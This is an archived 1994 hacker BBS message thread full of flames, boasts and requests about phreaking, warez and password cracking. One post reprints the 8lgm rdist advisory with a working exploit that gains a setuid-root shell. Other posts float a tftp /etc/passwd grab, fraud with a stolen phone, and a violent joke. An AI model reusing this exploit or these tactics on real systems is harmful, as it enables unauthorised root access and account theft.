Date: Sat Jul 9 16:53:20 1994 you thought wrong natalie From dmonger@yabbs Sat Jul 9 18:09:53 1994 From: dmonger@yabbs To: Delmar@yabbs Subject: re: Where is the 0 dayz Date: Sat Jul 9 18:09:53 1994 who say s all hacking has to be on computers? -peter From Mystery@yabbs Sat Jul 9 23:30:19 1994 From: Mystery@yabbs To: rattler@yabbs Subject: re: FSP Date: Sat Jul 9 23:30:19 1994 No problem... Glad to be of help... ;) From Mystery@yabbs Sun Jul 10 00:28:20 1994 From: Mystery@yabbs To: gpf_no_2@yabbs Subject: re: FSP Date: Sun Jul 10 00:28:20 1994 Why is it that people who thing they are really cool make things hard to read by writing elite as 3l33t or dude as d00d or some crap like that? From Zbadba@yabbs Sun Jul 10 00:37:56 1994 From: Zbadba@yabbs To: Jeremiah@yabbs Subject: re: Phrack-44 Date: Sun Jul 10 00:37:56 1994 "cosmos" is the handle of choice for would-be phone phreaks and such all over america, seeing as how it's the name of a well known at&t computer system. \ From cosmos@yabbs Sun Jul 10 01:39:40 1994 From: cosmos@yabbs To: dmonger@yabbs Subject: re: Where is the 0 dayz Date: Sun Jul 10 01:39:40 1994 In message re: Where is the 0 dayz, dmonger said: > who say s all hacking has to be on computers? > > -peter > The lame shits who read phrack, phun, LOD, (your 3l33t mag here).... The same lame shits that then gather up 2.5 billion scripts and run them all on some system(usually a freenet or their schools server). The same lame shits that then boast and brag on #hack about how elite they are and how its |<-rAd to have r00t access. The same lame shits that couldnt explain the difference between Kerberos and Secure RPC. But then again, they dont have to....| g0tZ rdist scr|ptz d00d Fuck em. Cosmos From cosmos@yabbs Sun Jul 10 01:42:22 1994 From: cosmos@yabbs To: Zbadba@yabbs Subject: re: Phrack-44 Date: Sun Jul 10 01:42:22 1994 In message re: Phrack-44, Zbadba said: > "cosmos" is the handle of choice for would-be phone phreaks and > such all over america, seeing as how it's the name of a well known at&t > computer system. \ Actually, its a text written by Carl Sagan on astronomy and universal physics...but I wont hold it against you. As for phone phreaking, thievery aint my style. Cosmos From dmonger@yabbs Sun Jul 10 01:56:24 1994 From: dmonger@yabbs To: cosmos@yabbs Subject: re: Where is the 0 dayz Date: Sun Jul 10 01:56:24 1994 hell, i read phrak, at least back issues i read 2600 sometimes i don't take them as gospel tho -peter From Zbadba@yabbs Sun Jul 10 18:38:51 1994 From: Zbadba@yabbs To: cosmos@yabbs Subject: re: Phrack-44 Date: Sun Jul 10 18:38:51 1994 Actually, its a text written by Carl Sagan on astronomy and universal physics...but I wont hold it against you. --- Well met. It's a right good text, too. From Badger01@yabbs Mon Jul 11 18:58:09 1994 From: Badger01@yabbs To: cosmos@yabbs Subject: re: Phrack-44 Date: Mon Jul 11 18:58:09 1994 >But I won't hold it against you. Dude, you gotta watch it. That's a massive straight line. You left yourself way open with that one. But I won't hold it against you. :) Badger01 From feotus@yabbs Mon Jul 11 19:47:09 1994 From: feotus@yabbs To: Zbadba@yabbs Subject: re: Phrack-44 Date: Mon Jul 11 19:47:09 1994 all Cosmos wasnt all that good of a book. Carl sued Apple too 8) cos, you got any rdist scripts man? My copy got deleted and now I cant crack any sites man. I was so awesome as root. I even logged into IRC from teh root account. And I can post to usenet from the root account there too, everyone must really think I am a badass, and they had better, orI'll fake mail them on port 25 dood. (now that the sarcasm is out of the system) Kerberos is to hard a system too use IMO. Meaning from teh admin point of view it's not worht the trouble. We were looking at it for a site. It has limitation for users outside the US, and IMO doesnt doa good job with ket managment(but im a paranoid freek, go figure) From cosmos@yabbs Tue Jul 12 00:41:00 1994 From: cosmos@yabbs To: Badger01@yabbs Subject: re: Phrack-44 Date: Tue Jul 12 00:41:00 1994 In message re: Phrack-44, Badger01 said: > >But I won't hold it against you. > > Dude, you gotta watch it. That's a massive straight line. You left > yourself way open with that one. > > But I won't hold it against you. :) > > Badger01 Seeing as how I didnt say the above quote you so gracefully attributed to me I think I shall comment. Get your fucking head out of your ass and reply to the right people moron. Cosmos From Badger01@yabbs Tue Jul 12 17:09:21 1994 From: Badger01@yabbs To: cosmos@yabbs Subject: re: Phrack-44 Date: Tue Jul 12 17:09:21 1994 >Get your fucking head out of your ass and reply to the right people moron. That you? Hate to reply incorrectly. Boy, you must be really insecure about that microcephalic lump you use for a cerebellum if that's the best insult you can come up with. But it must be hard to be you, what with that endless font of banality spewing forth and getting all over yourself like being walking excrement as painful as it seems? I figure I should ask you, since you are the master of it, and I am interested in just how low you can sink. (BTW: Naming yourself after a book that was disdained by almost everyone in Astronomy and blown out of the water by Andrevich's TOTALITY LOG is fairly disappointing...I come looking for the king of flames, and I find the court jester holding the sceptre quaking in his palsied hands.) Well, have a nice day, Mr. Originality. Badger01 From Gnarr@yabbs Tue Jul 12 18:04:53 1994 From: Gnarr@yabbs To: cosmos@yabbs Subject: 1176 Date: Tue Jul 12 18:04:53 1994 Um...maybe I missed something cos...but maybe you should go back and read message 1176....If I can read correctly..which I assume I can, you did in fact write "but I won't hold it against you" in the message :) From Natalie@yabbs Tue Jul 12 18:26:33 1994 From: Natalie@yabbs To: cosmos@yabbs Subject: re: Phrack-44 Date: Tue Jul 12 18:26:33 1994 billions and billions...... (in my best carl sagan voice, of course) natalie From feotus@yabbs Wed Jul 13 13:01:45 1994 From: feotus@yabbs To: all@yabbs Subject: 900 number Date: Wed Jul 13 13:01:45 1994 Does anyone have the starting cost for a 900 number? There are some neat scams you can run with them. also, has anyone succesfully built a darkbox? I am trying to find the schemetics for one, but no luck as the ones I found were corrupted. From cosmos@yabbs Thu Jul 14 00:05:59 1994 From: cosmos@yabbs To: all@yabbs Subject: |<-RaD 3l33t sCr|PtZ d00d Date: Thu Jul 14 00:05:59 1994 [8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991: This advisory has been sent to: INFOHAX BUGTRAQ CERT/CC =========================================================================== [8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991 PROGRAM: rdist(1)(/usr/ucb/rdist or /usr/bin/rdist) VULNERABLE OS's: SunOS 4.1.2 or earlier (Patch-ID# 100383-06 fixes this) A/UX 2.0.1 SCO 3.2v4.2 BSD NET/2 Derived Systems Most systems supporting BSD rdist DESCRIPTION: rdist(1) uses popen(3) to execute sendmail(8) as root. It can therefore be made to execute arbitary programs as root. IMPACT: Any user with access to rdist(1) can become root. REPEAT BY: This example demonstrates how to become root on most affected machines by creating a set-uid root shell. Please do not do this unless you have permission. Create the following file, 'distfile': 8<--------------------------- cut here ---------------------------- HOSTS = localhost FILES = BullInTheHeather ${FILES} -> ${HOSTS} install /tmp/1 ; notify user ; 8<--------------------------- cut here ---------------------------- Create the following file, 'usr.c': 8<--------------------------- cut here ---------------------------- main() { setuid(0); chown("sh", 0, 0); chmod("sh", 04755); exit(0); } 8<--------------------------- cut here ---------------------------- (Lines marked with > represent user input) >% cp /bin/sh . >% cc -o usr usr.c >% set path=(. $path) >% setenv IFS / >% rdist updating host localhost rdist: BullInTheHeather: No such file or directory notify @localhost ( user ) >% ls -l -rwsr-xr-x 1 root 106496 Mar 4 00:25 sh >% ./sh # FIX: 1. Contact your vendor for a fix. Sun's latest rdist patch (Patch-ID# 100383-06) fixes this hole in SunOS. Some vendors closed this hole while fixing an unrelated problem published by CERT in their advisory: CA-91:20.rdist.vulnerability. 2. In the meantime, restrict access to rdist. FEEDBACK AND CONTACT INFORMATION: report security flaws) for [8lgm] Advisories) enquiries) System Administrators are encouraged to contact us for any other information they may require about the problems described in this advisory. We welcome reports about which platforms this flaw does or does not exist on. =========================================================================== From cosmos@yabbs Thu Jul 14 00:07:24 1994 From: cosmos@yabbs To: all@yabbs Subject: re: |<-RaD 3l33t sCr|PtZ d00d Date: Thu Jul 14 00:07:24 1994 There you go kids. If you dont have one already... Now, who says I dont give the kiddies anything?? Cosmos From Quetzal@yabbs Thu Jul 14 14:41:34 1994 From: Quetzal@yabbs To: all@yabbs Subject: Cell phones Date: Thu Jul 14 14:41:34 1994 I recently Jacked some businesman for a cell phone and was wondering if there is some kind of way to get free calls without going through credit checks, etc I was thinking about trashing around certain service providers to find serial numbers... mail any suggestion to From cosmos@yabbs Thu Jul 14 16:57:58 1994 From: cosmos@yabbs To: Quetzal@yabbs Subject: re: Cell phones Date: Thu Jul 14 16:57:58 1994 In message Cell phones, Quetzal said: > I recently Jacked some businesman for a cell phone and was wondering if > there is some kind of way to get free calls without going through credit > checks, etc I was thinking about trashing around certain service > providers to find serial numbers... mail any suggestion to > > Jacked??!! Must be an elite term for pilfered. Fucking thieves... Cosmos From dmonger@yabbs Thu Jul 14 18:20:22 1994 From: dmonger@yabbs To: cosmos@yabbs Subject: re: Cell phones Date: Thu Jul 14 18:20:22 1994 oh well cosmos, i was happy to see you don't seem to swear as much on 386bsd boards tho or was that not you. -peter From cosmos@yabbs Fri Jul 15 00:11:06 1994 From: cosmos@yabbs To: dmonger@yabbs Subject: re: Cell phones Date: Fri Jul 15 00:11:06 1994 In message re: Cell phones, dmonger said: > oh well cosmos, > > i was happy to see you don't seem to swear as much on 386bsd boards tho > > or was that not you. > > -peter > That was my angelic twin. Cosmos From Skywise@yabbs Fri Jul 15 10:02:53 1994 From: Skywise@yabbs To: all@yabbs Subject: re: Date: Fri Jul 15 10:02:53 1994 I like #hack/ .s .S /s From Coren@yabbs Fri Jul 15 13:34:11 1994 From: Coren@yabbs To: all@yabbs Subject: DOD breakins Date: Fri Jul 15 13:34:11 1994 Just curious if anyone else heard about the breakins at the Department of Defense. Seems somone ran a lot of scripts against them. The article said there as one arrest. Anyone else have news? Chaos. Artimage.- From cosmos@yabbs Fri Jul 15 14:39:45 1994 From: cosmos@yabbs To: Coren@yabbs Subject: re: DOD breakins Date: Fri Jul 15 14:39:45 1994 In message DOD breakins, Coren said: > Just curious if anyone else heard about the breakins at the > Department of Defense. Seems somone ran a lot of scripts against them. > The article said there as one arrest. Anyone else have news? > Chaos. > Artimage.- Stupid is as Stupid does. (quote of the day) Even 99% of the wanker script c0d3z kiddies knows enough NOT to run scripts on the DoD. Hope they fucking fry em. Cosmos From bart@yabbs Fri Jul 15 18:08:56 1994 From: bart@yabbs To: all@yabbs Subject: Hacking The Inet. Date: Fri Jul 15 18:08:56 1994 Yo. Heres a tip to hacking on the internet...I got this as an inside tip...dont spread it around too much I got into TELENENET like you said, asked for name and password... didn't work Telnet to that site ^^^^^^^^^^^^^^^^ for hacking tips... -=-BarT-=- From bart@yabbs Fri Jul 15 18:11:12 1994 From: bart@yabbs To: Coren@yabbs Subject: re: DOD breakins Date: Fri Jul 15 18:11:12 1994 Yea A Man!!! I heared about that That Wuz KKoool breaking in To PLaces is cool.. I BrokE into my School ONce and Stole The disks in THe ComPUter Lab there Was Pac Frogger and Karateka on THEm I also FormAteted the hardDrives hahahahahahahhaAHAhaHAHah! I also Took sujm HCalk! -=-BarT-=- From Natalie@yabbs Sat Jul 16 15:46:28 1994 From: Natalie@yabbs To: cosmos@yabbs Subject: re: DOD breakins Date: Sat Jul 16 15:46:28 1994 hey cos...didja just see forrest gump? he always said stupid is a stupid does... (hooboy....and is THAT ever off topic...*snigger*) natlie From cosmos@yabbs Sat Jul 16 18:59:46 1994 From: cosmos@yabbs To: Natalie@yabbs Subject: re: DOD breakins Date: Sat Jul 16 18:59:46 1994 In message re: DOD breakins, Natalie said: > hey cos...didja just see forrest gump? he always said stupid is a stupid > does... > > (hooboy....and is THAT ever off topic...*snigger*) > > natliie I am Forest Gump. Cosmos From mike4721@yabbs Sat Jul 16 20:16:51 1994 From: mike4721@yabbs To: all@yabbs Subject: New Hacker Date: Sat Jul 16 20:16:51 1994 I'm a new hacker, does anyone have some numbers and passwords to help me out? I have america online and my address is and my BIX address is! please help me if you can!!!!!!!! Robo Hak From slohack@yabbs Sat Jul 16 21:22:30 1994 From: slohack@yabbs To: mike4721@yabbs Subject: re: New Hacker Date: Sat Jul 16 21:22:30 1994 Don't expect people to just give you account&passwd's. Learn about hacking don't expect everything to be handed to you and how can you expect people to take you seriously if you ask for something illegal (accounts) and tell them to send them to you legit accounts on BIX and AOL!!! ^^^ / hmm.... From slohack@yabbs Sat Jul 16 21:33:19 1994 From: slohack@yabbs To: slohack@yabbs Subject: re: New Hacker Date: Sat Jul 16 21:33:19 1994 Guess my reply was a little nicer then cos's will be...... -slohack awaiting an entertaing reply from cosmos..... From cosmos@yabbs Sun Jul 17 00:36:26 1994 From: cosmos@yabbs To: mike4721@yabbs Subject: re: New Hacker Date: Sun Jul 17 00:36:26 1994 In message New Hacker, mike4721 said: > I'm a new hacker, does anyone have some numbers and passwords to help me > out? I have america online and my address is and my BIX > address is! please help me if you can!!!!!!!! > > Robo Hak My standard advice: Large caliber handgun...close range. Cosmos From bart@yabbs Sun Jul 17 03:07:13 1994 From: bart@yabbs To: cosmos@yabbs Subject: two r's Date: Sun Jul 17 03:07:13 1994 Forrest Gump. -=-BarT-=- From bart@yabbs Sun Jul 17 03:08:45 1994 From: bart@yabbs To: mike4721@yabbs Subject: re: New Hacker Date: Sun Jul 17 03:08:45 1994 mike blurted the following: --------------------------- Im a new hacker,does anyone have some num..blah blah blah blahhhblah blah blah blahb blah,blah blahhhh? ---------------------------- gpf....hand me another pair of pants. -=-BarT-=- From bart@yabbs Sun Jul 17 03:10:05 1994 From: bart@yabbs To: cosmos@yabbs Subject: re: New Hacker Date: Sun Jul 17 03:10:05 1994 Cosmos spat sum shit like this: ----------------------------- advivce.. Large Gun...CLose Range.. how about a small gun..repeated shots..? -=-BarT-=- From GPF@yabbs Sun Jul 17 12:01:44 1994 From: GPF@yabbs To: bart@yabbs Subject: re: New Hacker Date: Sun Jul 17 12:01:44 1994 bart wrote: >how about a small gun..repeated shots..? nope.... he might go unconscious before he actually cracked his obviously thick skull.... From bart@yabbs Sun Jul 17 12:23:51 1994 From: bart@yabbs To: GPF@yabbs Subject: dead hackerz. Date: Sun Jul 17 12:23:51 1994 Gpf Chanted the following bullshit: ___________________________________________ nope,he might go unconscsious before he actually cracked his skull. *************************************************************************** ****** cool then we can fondle and grope him...always wanted to do that to a dead hacker....*gasp moan slobber pant* -=-BarT-=- From Natalie@yabbs Sun Jul 17 14:39:08 1994 From: Natalie@yabbs To: cosmos@yabbs Subject: re: DOD breakins Date: Sun Jul 17 14:39:08 1994 oh look. i can't even spell my name right. *sigh* natalie From Natalie@yabbs Sun Jul 17 14:40:42 1994 From: Natalie@yabbs To: bart@yabbs Subject: re: dead hackerz. Date: Sun Jul 17 14:40:42 1994 natalie From bart@yabbs Sun Jul 17 18:21:13 1994 From: bart@yabbs To: Natalie@yabbs Subject: re: dead hackerz. Date: Sun Jul 17 18:21:13 1994 Nat rapped this line: --=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- *slobber pant moan giggle rub self* -=-BarT-=- From GPF@yabbs Sun Jul 17 22:23:46 1994 From: GPF@yabbs To: bart@yabbs Subject: re: dead hackerz. Date: Sun Jul 17 22:23:46 1994 judging by some of the ppl that have shown up on this board lately i'd say would be more appropriate. From Xela@yabbs Mon Jul 18 02:21:50 1994 From: Xela@yabbs To: Natalie@yabbs Subject: re: dead hackerz. Date: Mon Jul 18 02:21:50 1994 Hey, necrophilia is the safest sex going around. You just can't beat it. *snicker, snicker* X From Badger01@yabbs Mon Jul 18 14:43:46 1994 From: Badger01@yabbs To: all@yabbs Subject: I'm a federal agent... Date: Mon Jul 18 14:43:46 1994 Hi, I'm a federal agent pretending to be a hacker...could somebody incriminate themselves, please? Jesus, how stupid can they get? Badger01 From dmonger@yabbs Mon Jul 18 15:12:57 1994 From: dmonger@yabbs To: Badger01@yabbs Subject: re: I'm a federal agent... Date: Mon Jul 18 15:12:57 1994 nah, i can't believe even the feds are that stoopid :) must be a real hacker -peter From Carsenio@yabbs Tue Jul 19 19:05:34 1994 From: Carsenio@yabbs To: all@yabbs Subject: general spew Date: Tue Jul 19 19:05:34 1994 hmm.. pardon the candor but I just returned to this bbs after a long period of time to see how this message base was going, decided to read the last 15 messages or so, and either i'm hopelessly disillusioned or those messages were filled with absolutely nothing. Now I realize you all can't stay on topic all the time, but hey.. save the sysop sum fuqn disk space will ya... i think i'll be back in another couple months or so. with love.. -carsenio From dmonger@yabbs Tue Jul 19 19:26:32 1994 From: dmonger@yabbs To: Carsenio@yabbs Subject: re: general spew Date: Tue Jul 19 19:26:32 1994 In message general spew, Carsenio said: > hmm.. pardon the candor but I just returned to this bbs after a long > period of time to see how this message base was going, decided to read the > last 15 messages or so, and either i'm hopelessly disillusioned or those > messages were filled with absolutely nothing. Now I realize you all can't oh goodie. yet another person to tell us all what should be on #hack .. just what were were missing > stay on topic all the time, but hey.. save the sysop sum fuqn disk space > will ya... i think i'll be back in another couple months or so. we'll be anxiously awaiting your return -peter From brael@yabbs Wed Jul 20 05:19:18 1994 From: brael@yabbs To: all@yabbs Subject: hmmm Date: Wed Jul 20 05:19:18 1994 n e 1 know accurately what the difference between FGA,FGB,FGC,FGD calls r?.. i think feature grp a is normal pots phone calls.. fgc's r like 950's and FGD is 800 but im not sure about FGB.. whoops i meant FGC .. im wondering if there's n e pratical purpose behind formatting FGC originating and terminating phone calls.. i always get all telco curious when i smoke green kind.. brael@crl.c0m From brael@yabbs Sat Jul 23 05:24:04 1994 From: brael@yabbs To: brael@yabbs Subject: 3lee---->T! Date: Sat Jul 23 05:24:04 1994 k-rad NUI: parmasterx75 uuuh or was it t.spnb01 26245400080177 bound eye m!haaa @ll h@quorz r stupid From gritos@yabbs Sun Jul 24 03:19:04 1994 From: gritos@yabbs To: brael@yabbs Subject: nui... Date: Sun Jul 24 03:19:04 1994 hello man! do ya have the dial-up for k-rad?? tnxs! El Griton From gritos@yabbs Sun Jul 24 03:19:50 1994 From: gritos@yabbs To: all@yabbs Subject: hp sites.. Date: Sun Jul 24 03:19:50 1994 Hello... Anybody knows ftp sites with hp stuff? tnxs! El Griton From GPF@yabbs Sun Jul 24 10:13:15 1994 From: GPF@yabbs To: gritos@yabbs Subject: re: hp sites.. Date: Sun Jul 24 10:13:15 1994 In message hp sites.., gritos incoherently babbled the following: > Hello... > Anybody knows ftp sites with hp stuff? > > tnxs! > > > El Griton yeah man, i hear there's some cool \/\/aR3Z at a telnet bbs at port 19.... 0 dayZ d00d!! |<-RaD rDiSt s| hello man! > do ya have the dial-up for k-rad?? > tnxs! > > El Griton And you though they couldnt possibly get any more lame... Cosmos From chaos@yabbs Sun Jul 24 13:21:01 1994 From: chaos@yabbs To: all@yabbs Subject: FTP Sites Date: Sun Jul 24 13:21:01 1994 Heres a FTP site listing... Phrack can be found at in /pub/phrack now. /pub/mccoy/computer-underground /pub/SECURITY /pub/bradleym enjoy.. CHA0S From N_Rex@yabbs Sun Jul 24 16:44:26 1994 From: N_Rex@yabbs To: gritos@yabbs Subject: HP Sites Date: Sun Jul 24 16:44:26 1994 Do you have fsp access? I might be able to point you to a site or two there. Whats in it for me? Nervous Rex From GPF@yabbs Sun Jul 24 17:51:00 1994 From: GPF@yabbs To: N_Rex@yabbs Subject: re: HP Sites Date: Sun Jul 24 17:51:00 1994 In message HP Sites, N_Rex said: > Do you have fsp access? I might be able to point you to a site or two > there. Whats in it for me? > Nervous Rex d00d, 3y3 hav3 th3 |<-raD \/\/iNd0z3 4.O b3t4, d00d 3y3 als0 #av3 phr0gg3r f0r th3 (64 From GPF@yabbs Sun Jul 24 17:57:22 1994 From: GPF@yabbs To: chaos@yabbs Subject: re: FTP Sites Date: Sun Jul 24 17:57:22 1994 In message FTP Sites, chaos incoherently ranted the following: > > ^^^^^^----------|<-RaD alt.26OO archive (no, i'm not making this up) here is the login announcement for your amusement: 230-There are currently 1 out of a max 2 anonymous ftp users. 230- 230- /pub/2600 - alt.2600 archive 230- /pub/frb - Free Radio Berkeley 230- /pub/hack - Misc. Files 230- /pub/pyro - PYRO Files 230- /pub/magik - MAGIK Magazine Issues #1-2 230- 230-Send all bugs/comments/suggestions/money to '' 230- If you need a home for something just let me know! 230- 230- h4ppy h4c/<1/\/g! 230- > /pub/SECURITY > /pub/bradleym > > > enjoy.. > > CHA0S you put that ftp site up as a joke, right? From dmonger@yabbs Sun Jul 24 18:46:19 1994 From: dmonger@yabbs To: GPF@yabbs Subject: re: HP Sites Date: Sun Jul 24 18:46:19 1994 ya know ... when you argue a lot with two years old, people soon start to wonder who's older :) -peter From kristo@yabbs Sun Jul 24 19:24:23 1994 From: kristo@yabbs To: GPF@yabbs Subject: re: hp sites.. Date: Sun Jul 24 19:24:23 1994 I got a better one.. try this: ftp and download bunch of Machosoft hot -1 day wareZ.. .. and no, I couldn't resist either, how lame. ;) From brael@yabbs Mon Jul 25 04:51:46 1994 From: brael@yabbs To: kristo@yabbs Subject: re: hp sites.. Date: Mon Jul 25 04:51:46 1994 oooooh n0 the k-k3wln d00dn sarKASM tip is getting bloody RAPED!.. fuckfuckfuck... some1 flow me some air.. brael From UncleSid@yabbs Mon Jul 25 23:53:35 1994 From: UncleSid@yabbs To: all@yabbs Subject: crack etc. Date: Mon Jul 25 23:53:35 1994 HEY! I found this cool program call Crack...I thought it was like a file on crack the drug ya know? Well I fooled around with it on my system and ya know shows the passwords! IT was cool I looged in as some people and played around with their account...anyways I ftp'd it from if anyone wants it...I also have some sites with pirated shit If yer interested From cosmos@yabbs Mon Jul 25 23:56:05 1994 From: cosmos@yabbs To: UncleSid@yabbs Subject: re: crack etc. Date: Mon Jul 25 23:56:05 1994 In message crack etc., UncleSid said: > HEY! I found this cool program call Crack...I thought it was like a file > on crack the drug ya know? Well I fooled around with it on my system and > ya know shows the passwords! IT was cool I looged in as some > people and played around with their account...anyways I ftp'd it from > if anyone wants it...I also have some sites with pirated > shit If yer interested I smell setup....nobody is this stupid. Cosmos From dmonger@yabbs Mon Jul 25 23:59:33 1994 From: dmonger@yabbs To: UncleSid@yabbs Subject: re: crack etc. Date: Mon Jul 25 23:59:33 1994 Uncle Sid? (sam?) |<00|_ ugh, now i remember why i like shadowed password files ... anyway the worlds full of morons too bad yabbs seems to be finally getting its share -peter From Death@yabbs Tue Jul 26 00:57:00 1994 From: Death@yabbs To: dmonger@yabbs Subject: re: crack etc. Date: Tue Jul 26 00:57:00 1994 Sadly, it was inevitable... *sigh* --Death From UncleSid@yabbs Tue Jul 26 01:22:36 1994 From: UncleSid@yabbs To: all@yabbs Subject: re: crack etc. Date: Tue Jul 26 01:22:36 1994 Was that a pathetic attemp at a flame? why did you flmame me anyways..this ius #hack aint' it? I didnt' post on the wrong group did why did you try and flame guys are patehtic From Death@yabbs Tue Jul 26 01:48:01 1994 From: Death@yabbs To: UncleSid@yabbs Subject: re: crack etc. Date: Tue Jul 26 01:48:01 1994 Just to let you know, in case you really ARE that out of it... Crack is known about by around 90% of the sys admins of the world... due to the amount of CPU time it hogs it is also very recognizable as being itself... Also several sysadmins use it themselves to check their system's integrity. If you are caught running it you WILL get in trouble, and unless your sysadmin is a moron, you will be caught... --Death From Skywise@yabbs Tue Jul 26 09:31:28 1994 From: Skywise@yabbs To: UncleSid@yabbs Subject: re: crack etc. Date: Tue Jul 26 09:31:28 1994 gimmegimmegimme From Skywise@yabbs Tue Jul 26 09:33:19 1994 From: Skywise@yabbs To: Death@yabbs Subject: re: crack etc. Date: Tue Jul 26 09:33:19 1994 yous guys guts no sense of humor sheeeesh From Badger01@yabbs Tue Jul 26 09:50:09 1994 From: Badger01@yabbs To: cosmos@yabbs Subject: re: crack etc. Date: Tue Jul 26 09:50:09 1994 Yet again, someone MYSTERIOUSLY shows up with something antsy. You think we're being watched? Badger01 "Paranoia is just heightened awareness" From nirvana@yabbs Tue Jul 26 11:24:27 1994 From: nirvana@yabbs To: UncleSid@yabbs Subject: re: crack etc. Date: Tue Jul 26 11:24:27 1994 To prove ur credentials , u had better give us some proof of ur 'pirated shit' sites how about posting them ... toodle-oodle From GPF@yabbs Tue Jul 26 12:08:58 1994 From: GPF@yabbs To: nirvana@yabbs Subject: re: crack etc. Date: Tue Jul 26 12:08:58 1994 In message re: crack etc., nirvana moronically ranted the following: > To prove ur credentials , u had better give us some proof of ur 'pirated > shit' sites > > how about posting them ... > > toodle-oodle oh yeah, post them on a public bbs, good idea.. did someone post the address of yabbs on a \/\/aR3Z bbs is west virginia or something? christ..... From Skywise@yabbs Tue Jul 26 17:30:56 1994 From: Skywise@yabbs To: GPF@yabbs Subject: re: crack etc. Date: Tue Jul 26 17:30:56 1994 |_i|<3 3y3 s3d, n0 c3nts u\/ HuMoR From Natalie@yabbs Tue Jul 26 19:46:45 1994 From: Natalie@yabbs To: nirvana@yabbs Subject: re: crack etc. Date: Tue Jul 26 19:46:45 1994 oh pleeeeeeeeeeease. natalie From UncleSid@yabbs Tue Jul 26 21:56:33 1994 From: UncleSid@yabbs To: all@yabbs Subject: re: crack etc. Date: Tue Jul 26 21:56:33 1994 Heh, i've been runnign crack on a few different systems and no one said anyhting waht do you have to say for yourselvees now. Hey, they gave me 99 lines :) From bart@yabbs Tue Jul 26 22:10:05 1994 From: bart@yabbs To: all@yabbs Subject: NO?! Date: Tue Jul 26 22:10:05 1994 Insert some mindless moronic drivel about 'finding' a password craciker here and offer pr8'd shit... three words! haw haw haw RELEASE THE HOUNDS! -=-BarT-=- From bart@yabbs Tue Jul 26 22:11:11 1994 From: bart@yabbs To: UncleSid@yabbs Subject: strike one! Date: Tue Jul 26 22:11:11 1994 try ALT.MORONIC.FUCK.UPS -=-BarT-=- From bart@yabbs Tue Jul 26 22:12:45 1994 From: bart@yabbs To: GPF@yabbs Subject: echochat! Date: Tue Jul 26 22:12:45 1994 gpffffffffff! EcHOcHaT aND rAd waLdO THE !3 yR OLD HACKER SLASH dj HaWhAHHWAHWH stop yer killing me! -=-BarT-=- From GPF@yabbs Tue Jul 26 22:30:34 1994 From: GPF@yabbs To: UncleSid@yabbs Subject: re: crack etc. Date: Tue Jul 26 22:30:34 1994 wow, you can crack passwords by leeching off the work of others, i hope that one day i can be as cool as you. From nieva@yabbs Tue Jul 26 23:04:34 1994 From: nieva@yabbs To: all@yabbs Subject: ware's? Date: Tue Jul 26 23:04:34 1994 i was downloading software last nite and thout: shareware sucks1 i need real programs! does this place have ware's? From phenelge@yabbs Tue Jul 26 23:26:22 1994 From: phenelge@yabbs To: all@yabbs Subject: re: ware's? Date: Tue Jul 26 23:26:22 1994 Jeeeezus H. Christ! Get a clue, Uncle_Sid and Nieva! Personally, Nieva's sounds like bullshit if I ever read it. Next she's gonna say she has an account on AOL. Oh, here's an idea I've had... I haven't even bothered trying it, it just popped into my head last nite... Why not use tftp to get /etc/password, then retool Crack to decode it? tftp is sort of a really stupid version of ftp, and allows you into the real /ect folder. If you named Crack something like PGP, it could work. I haven't looked at Crack source in a while, it's generally sort of a lamer tool (U_S!!!) but this could sort of be interesting. Does anyone have an opinion on this? From bart@yabbs Wed Jul 27 00:11:35 1994 From: bart@yabbs To: nieva@yabbs Subject: re: ware's? Date: Wed Jul 27 00:11:35 1994 nieva babbled this shit: i was downloading software last nite and thout: shareware sucks1 i need real programs! does this place have ware's? ---------------------------------------------------- 'warez' are illegal and you are discussing illegal activities.. we will have none of that on here,pal.....Register or Die! I have to go I am singing in my Church Choir tonight.... May God Smile Upon You Biff 7:21 Saint Bart From cosmos@yabbs Wed Jul 27 00:15:00 1994 From: cosmos@yabbs To: nieva@yabbs Subject: re: ware's? Date: Wed Jul 27 00:15:00 1994 In message ware's?, nieva said: > i was downloading software last nite and thout: shareware sucks1 i need > real programs! does this place have ware's? You know, I was reading this message base and thought: these users are complete fucking wankers. Cosmos From cosmos@yabbs Wed Jul 27 00:16:13 1994 From: cosmos@yabbs To: phenelge@yabbs Subject: re: ware's? Date: Wed Jul 27 00:16:13 1994 In message re: ware's?, phenelge said: > Jeeeezus H. Christ! > Get a clue, Uncle_Sid and Nieva! Personally, Nieva's sounds like bullshit > if I ever read it. Next she's gonna say she has an account on AOL. > > Oh, here's an idea I've had... I haven't even bothered trying it, it just > popped into my head last nite... > Why not use tftp to get /etc/password, then retool Crack to decode it? > tftp is sort of a really stupid version of ftp, and allows you into the > real /ect folder. If you named Crack something like PGP, it could work. I > haven't looked at Crack source in a while, it's generally sort of a lamer > tool (U_S!!!) but this could sort of be interesting. Does anyone have an > opinion on this? And they call this hacking?? Cosmos From Natalie@yabbs Wed Jul 27 00:24:38 1994 From: Natalie@yabbs To: UncleSid@yabbs Subject: re: crack etc. Date: Wed Jul 27 00:24:38 1994 lamer wanker fuckhead natalie From Natalie@yabbs Wed Jul 27 00:26:48 1994 From: Natalie@yabbs To: UncleSid@yabbs Subject: re: crack etc. Date: Wed Jul 27 00:26:48 1994 even i'm not that dumb. and i'm notorious for not knowing a damn thing about computers. so what does this say about you? natalie From brael@yabbs Wed Jul 27 03:25:16 1994 From: brael@yabbs To: phenelge@yabbs Subject: re: ware's? Date: Wed Jul 27 03:25:16 1994 on ur crack ideas.. a) tftp grabs of etc/passwd are waaaaay outdated and are rare finds.. although good to use if ur on an x25 system or an entirely self-sustained network where security conciousness isn't has high as the inet.. b) why bother using/smoking crack when you can run password crackers like PCUPWC on ur 486 66mhz PC isolated from n e 1 and every1.. n passwd crackers don't d0 jack on a system that requires digits and non-dictionary passwd entries.. p.s. n e 1 here wanna talk 1aeSs switch theory email me From Skywise@yabbs Wed Jul 27 09:56:38 1994 From: Skywise@yabbs To: Natalie@yabbs Subject: re: crack etc. Date: Wed Jul 27 09:56:38 1994 lamer wanker fuckhead natalie Q: Which descriptive word in the above list does not belong with the other three and why? From Skywise@yabbs Wed Jul 27 09:57:18 1994 From: Skywise@yabbs To: Natalie@yabbs Subject: re: crack etc. Date: Wed Jul 27 09:57:18 1994 A: natalie. It has three syllables while the other words have only two. From Quetzal@yabbs Wed Jul 27 11:37:27 1994 From: Quetzal@yabbs To: arachnoi@yabbs 